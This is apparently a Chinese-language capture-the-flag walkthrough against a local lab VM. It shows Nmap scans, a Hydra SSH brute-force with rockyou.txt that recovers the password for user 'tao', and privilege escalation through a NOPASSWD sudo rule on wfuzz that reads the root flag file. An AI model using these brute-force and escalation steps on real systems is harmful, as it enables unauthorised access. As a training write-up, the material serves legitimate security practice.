┌──(root㉿kali)-[/miaosec] └─# nmap -sn 192.168.2.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 11:26 CST Nmap scan report for 192.168.2.1 Host is up (0.0011s latency). MAC Address: 0A:00:27:00:00:07 (Unknown) Nmap scan report for 192.168.2.2 Host is up (0.0014s latency). MAC Address: 08:00:27:48:64:28 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.38 Host is up (0.00075s latency). MAC Address: 08:00:27:68:7D:74 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.19 seconds
靶机IP:192.168.2.38
2、端口扫描
1.全端口扫描
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root㉿kali)-[/miaosec] └─# nmap --min-rate 10000 -p- 192.168.2.38 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 11:27 CST Nmap scan report for 192.168.2.38 Host is up (0.0014s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:68:7D:74 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 21.66 seconds
┌──(root㉿kali)-[/miaosec] └─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.38 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 11:28 CST Nmap scan report for 192.168.2.38 Host is up (0.00061s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA) | 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA) |_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519) 80/tcp open http Apache httpd 2.4.62 ((Debian)) |_http-title: Rockyou.txt - \xE5\xAF\x86\xE7\xA0\x81\xE5\xAD\x97\xE5\x85\xB8\xE6\x96\x87\xE4\xBB\xB6\xE4\xBB\x8B\xE7\xBB\x8D |_http-server-header: Apache/2.4.62 (Debian) MAC Address: 08:00:27:68:7D:74 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.88 seconds
3.udp扫描
1 2 3 4 5 6 7 8 9 10
┌──(root㉿kali)-[/miaosec] └─# nmap -sU --top-ports 100 192.168.2.38 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 11:28 CST Nmap scan report for 192.168.2.38 Host is up (0.00070s latency). All 100 scanned ports on 192.168.2.38 are in ignored states. Not shown: 56 closed udp ports (port-unreach), 44 open|filtered udp ports (no-response) MAC Address: 08:00:27:68:7D:74 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 51.70 seconds
┌──(root㉿kali)-[/miaosec] └─# hydra -l tao -P /usr/share/wordlists/rockyou.txt -s 22 ssh://192.168.2.38 -t 4 -v -I -e nsr Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-09 14:30:20 [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344402 login tries (l:1/p:14344402), ~3586101 tries per task [DATA] attacking ssh://192.168.2.38:22/ [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [INFO] Testing if password authentication is supported by ssh://tao@192.168.2.38:22 [INFO] Successful, password authentication is supported by ssh://192.168.2.38:22 [22][ssh] host: 192.168.2.38 login: tao password: rockyou [STATUS] attack finished for 192.168.2.38 (waiting for children to complete tests) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-09 14:30:33
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. tao@111:~$ id uid=1000(tao) gid=1000(tao) groups=1000(tao)
四、权限提升
查看sudo -l
1 2 3 4 5 6 7
tao@111:~$ sudo -l Matching Defaults entries for tao on 111: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tao may run the following commands on 111: (ALL) NOPASSWD: /usr/bin/wfuzz (ALL) NOPASSWD: /usr/bin/id
1、wfuzz读取文件
wfuzz的参数-w可以将文件作为字典进行输出 所以可以使用-w参数将root.txt读取出来
1 2 3 4
tao@111:~$ sudo /usr/bin/wfuzz -w /root/root.txt http://192.168.2.38/file.php?file=FUZZ ... 000000001: 200 0 L 0 W 0 Ch "flag{root-9bbd7af2a042a901b92dc203b3896621}" ...
